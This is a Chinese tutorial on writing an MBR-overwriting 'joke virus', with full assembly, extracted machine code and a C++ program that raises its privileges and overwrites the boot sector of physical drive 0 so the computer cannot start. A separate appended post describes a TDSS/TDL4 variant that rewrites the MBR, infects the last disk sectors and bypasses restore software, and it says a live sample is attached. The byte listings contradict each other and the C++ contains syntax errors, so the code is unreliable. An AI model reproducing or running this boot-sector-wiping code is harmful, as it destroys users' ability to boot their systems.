改写MBR

一个改写MBR的例子 

前言

  想要对MBR类的病毒进行一下研究与学习，在此期间，看了很多资料，其中帮助最大的就是金龟子学姐和willj学长发表的文章。一个从源码与实现角度来讲了一下，另外一个从反病毒角度来分析。

功能描述

该样本就只是一个简单的玩笑病毒，主要是让你不能开机，只在屏幕显示一串字符串。

0x1 什么是MBR

    MBR，就是硬盘的主引导记录，也就是硬盘的0柱面、0磁头、1扇区称为主引导扇区。这类病毒是格式化硬盘之后任然存在的病毒。该记录占用512个字节，它用于硬盘启动时将系统控制权交给用户指定的。简而言之，就是先于操作系统拿到控制权

0x2 病毒原理

• 准备好将要写入的MBR     
• 提升程序权限   调用CreateFile函数去打开物理驱动器的时候，必须具备调试权限，否则就会打开失败，打开失败我们就不能对MBR进行读取了

• 打开"\\\\.\\PHYSICALDRIVE0"文件  \\\\.\\PHYSICALDRIVE0"文件表示本机的物理驱动器0(一般是主硬盘)，也就是我们的MBR。
• 写入MBR

    成功写入MBR，我们也就拿到了先于系统的控制权了，就可以做很多事情了，但是这里我们只是在teletype模式下显示一串字符串。

0x3 汇编源码

下面是完整的汇编源码：

1. assume cs:code
2. code segment
3. start:
4. mov ax,12h ;使用12号功能，对显示器进行设置
5. int 10h
7. ;显示器的设置
8. mov bp, 7C18H ;字符串的起始偏移,为啥是7c18呢？代码得长度干好18H，哈哈
9. mov cx, 13h ;字符串长度
10. mov ax,1301h ;AH = 13h 调用功能号13 ,在teletype模式下显示字符串,AL = 01H
11. mov bx,0Ch ;BH = 00H BL = 0CH
12. mov dx,0h ;起始的行列
13. int 10h
15. jmp $ ;无线循环，防止代码进入数据区
17. code ends
18. end start

下面是对汇编代码的剖析:

• 对显示器进行设置

 int 10h中断是BIOS对系统屏幕显示器所提供的服务程序。我们可以调用int 10h中断来控制显示器的显示。使用INT 10H中断的时候，都先必须指定AH的值，AH的值是用来指定INT 10H将要调用的功能号。

1. mov ax,12h ;使用12号功能，对显示器进行设置
2. int 10h ;调用int 10h中断

• 指定显示字符串

1. mov bp, 7C18H ;字符串的起始偏移,为啥是7c18呢？代码得长度刚好18H，哈哈
2. mov cx, 13h ;字符串长度

• 对字符串显示进行设置

1. mov ax,1301h ;AH = 13h 调用功能号13 ,在teletype模式下显示字符串,AL = 01H
2. mov bx,0Ch ;BH = 00H BL = 0CH
3. mov dx,0h ;起始的行列

0x4 INT 10H中断的13号功能

功能描述：在Teletype模式下显示字符串

入口参数：AH＝13H
BH＝页码
BL＝属性,文字模式或颜色 (若AL=00H或 01H)
CX＝显示字符串长度
(DH、DL)＝坐标(行、列)
ES:BP＝显示字符串的地址 AL＝显示输出方式
0—— 字符串中只含显示字符，其显示属性在BL中。显示后，光标位置不变
1——字符串中只含显示字符，其显示属性在BL中。显示后，光标位置改变
2 ——字符串中含显示字符和显示属性。显示后，光标位置不变
3——字符串中含显示字符和显示属性。显示后，光标位置改变
出口参数：无

0x5 获取汇编的机器码

    上为什么要获取上面代码的机器码呢？因为我们的代码都是被编译器解释为机器码来执行的，这里我们面是汇编代码，所以需要编译链接之后可以将机器码拷贝出来。

编译连接：

• 用到的工具

• 用到的指令

将上面的解压后放到你觉得合适的地方，这里我是放在的C盘。这里编译是用到masm5.0里面的masm.exe程序。下面就对我们的代码进行编译。生成的*.obj文件存放在masm.exe程序的同位置，如果你想改变生成的位置，你可以在cmd显示Object filename [4.obj]的时候指定一个路径。

1. C:\masm>masm C:\Users\xiaopao\Desktop\4.asm

编译成功后就是连接了，连接我们要用到的就是masm5.0里面的link.exe程序。

 ok，程序连接成功，下面就是提取里面的机器码了。这里我用的是C32Asm，当然你也可以用WinHex

圈出来的部分就是我们的代码，下面是提取出来的。

B8 12 00 CD 10 BD 18 7C B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD 10 EB FE

我们把我们想要显示的字符串添加到后面去。

B8 12 00 CD 10 BD 18 7C B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD 10 E2 FE 06D 061 06B 065 020 062 079 20 78 69 61 6F 70 61 6F 00

0x6 主代码

MBR准备好了。那么就来写主程序吧。主程序就两个函数，一个用来提权，一个用来写MBR。直接贴代码吧

1. #include "stdafx.h"
2. #include <Windows.h>
3. #include <TlHelp32.h>
5. char temp[512]={
6. 0xB8,0x012,0x000,0x0CD,0x010,0x0BD,0x018,0x07C,0x0B9,0x00F,0x000,0x0B8,0x001,0x013,0x0BB,0x00C,
7. 0x000,0x0BA,0x000,0x000,0x0CD,0x010,0x0E8,0x0FE,0x06D,0x061,0x06B,0x065,0x020,0x062,0x079,0x020,
8. 0x078,0x069,0x061,0x06F,0x070,0x061,0x06F,0x000};
9. //自己写一个函数来提权。
10. void GetPrivileges()
11. {
12. //定义一个PLUID
13. HANDLE hProcess;
14. HANDLE hTokenHandle;
15. TOKEN_PRIVILEGES tp;
16. //获取当前进程的句柄
17. hProcess = GetCurrentProcess();
18. //
19. OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hTokenHandle);
20. //函数查看系统权限的特权值，返回信息到一个LUID结构体里。
21. tp.PrivilegeCount =1;
22. LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
23. tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
24. AdjustTokenPrivileges(hTokenHandle,FALSE,&tp,sizeof(tp),NULL,NULL);
25. CloseHandle(hTokenHandle);
26. CloseHandle(hProcess);
28. }
30. //下面的函数来读取"\\\\.\\PHYSICALDRIVE0"
31. void ReadPHYSICALDRIVE0()
32. {
33. HANDLE hFile;
34. DWORD dwReadSize;
35. // char lpBuffer[512];
36. //使用createFile打开这个文件
37. char str_Name[] = "\\\\.\\PHYSICALDRIVE0";
38. hFile = CreateFile(str_Name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL ,0);
39. if (hFile == INVALID_HANDLE_VALUE)
40. {
41. MessageBox(0, "wrong", "wrong", 0);
43. }
44. BYTE pMBR[512] ={0}; ;MBR为512个字节
45. memcpy(pMBR,temp,sizeof(temp)-1);
46. pMBR[510] =0x55; ;最后的标记位
47. pMBR[511] = 0xAA;
48. //用readfile来读取文件
49. WriteFile(hFile, pMBR, 512, &dwReadSize, NULL);
50. }
51. int _tmain(int argc, _TCHAR* argv[])
52. {GetPrivileges();
53. ReadPHYSICALDRIVE0();
54. return 0;

0x7 总结

运行我们编译好的主程序，然后重启就会发现我们的电脑无法正常启动了，并且在屏幕上会出现一串字符。如下图到这里一个简单的改写MBR的程序就写好了。

又一个改写MBR的病毒（TDSS TDL4） 

此毒为TDSS TDL4 的又一个变种。RIS2011 目前尚未收录此毒。
此毒的主要行为是改写MBR，并在硬盘尾部的190个扇区内写入病毒代码。
病毒的上述动作可穿透还原类软件对系统的保护。
我在Acronis True Image 2010的 Try&Decide模式保护下运行此样本，Acronis True Image 2010的 Try&Decide 保护被穿透了。具体表现为：运行病毒样本后，重启电脑，脱离Try&Decide模式，不能登录系统。
此后，用WIN7 PE U盘引导，在PE环境下，重建MBR，并用工具清除硬盘尾部190个扇区中的病毒代码。再重启系统。搞掂！

此毒行为的另一特点是：它添加的注册表项HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerPendingFileRenameOperations键值用普通的注册表编辑工具不能发现。但用XueTr可以发现（此键值指向病毒在当前用户临时目录下释放的两个tmp程序）

附图是运行此毒后的MBR改写、硬盘尾部扇区改写、文件释放、注册表改动以及XueTr所见的病毒驱动模块：

附件是病毒样本
样本名称2IC.rar 此毒为TDSS TDL4 的变种
此毒的主要行为是改写MBR，并在硬盘尾部的190个扇区内写入病毒代码。
上述病毒动作可穿透还原类软件。
我在Acronis True Image 2010的 Try&Decide模式保护下运行此样本，Acronis True Image 2010的 Try&Decide 保护被穿透了。具体表现为：重启电脑，脱离Try&Decide模式，不能登录系统。
此后，用WIN7 PE U盘引导，在PE环境下，重建MBR，并清除硬盘尾部190个扇区的病毒代码。再重启系统。搞掂！
附上此毒样本及其释放的病毒文件（无密码）；其中setup3541977020是此样本运行后释放的病毒主体